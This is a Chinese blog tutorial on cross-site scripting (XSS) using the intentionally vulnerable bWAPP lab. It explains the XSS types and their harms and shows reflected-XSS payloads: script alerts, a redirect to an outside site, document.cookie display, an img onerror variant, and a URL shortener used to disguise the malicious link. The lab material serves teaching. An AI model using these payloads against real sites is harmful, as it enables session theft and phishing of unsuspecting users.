WEB安全-跨站脚本攻击XSS

本文介绍了XSS(跨站脚本攻击)的三种类型:反射型、存储型和DOM型,详细阐述了XSS的危害,如盗取Cookie和执行恶意JavaScript。反射型XSS的特点是非持久化,通过诱使用户点击特殊链接来触发。防御措施包括不点击不明链接。文章还提供了反射型XSS的实例和防御建议,并推荐使用安全工具进行练习。
摘要由CSDN通过智能技术生成

XSS(跨站脚本攻击)

定义

浏览器将用户输入的内容,当做脚本执行,执行了恶意的功能,这种针对用户浏览器的攻击即跨站脚本攻击。

类型

主要分为三种类型:

  • 反射型

  • 存储型

  • DOM 型

XSS 危害

  • 盗取 Cookie
  • 盗取账户
  • 恶意软件下载
  • 键盘记录
  • 广告引流等等 JavaScript 能够写出的任意恶意功能

反射型 XSS

应用程序或 API 包括未经验证或未经转义的用户输入, 直接作为HTML 输出的一部分。一个成功的攻击可以让攻击者在受害者的浏览器中执行任意的 HTML 和 JavaScript 。

特点:非持久化,必须用户点击带有特定参数的链接才能引起。

影响范围:仅执行脚本的用户。

示例

SkyMacBookPro:~ demon$ docker run -d -p 0.0.0.0:8901:80 raesene/bwapp
<script>alert("hello world")</script>

image-20210816101253902

image-20210816102801637

<script>alert("点击此处修复");location.href="http://ceshis.com"</script>

image-20210816101616134

image-20210816103104373

<script>alert(document.cookie)</script>

image-20210816101711093

长网址缩短 (https://www.ft12.com)

http://192.168.43.120:8901/xss_get.php?firstname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&lastname=1&form=submit

image-20210816103631157

http://33h.co/wr3wj

image-20210816103718366

image-20210816103859911

image-20210816105505263

image-20210816112127046

/><img src=111.png onerror=alert(document.cookie)>

image-20210816112516272

防御措施

反射型 XSS 的限制与防御,危害范围相对较小,多为一次点击触发一次,对陌生的链接,不要随意点开。

练习

对于 bWAPP 的不同类型反射型 XSS 漏洞练习。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值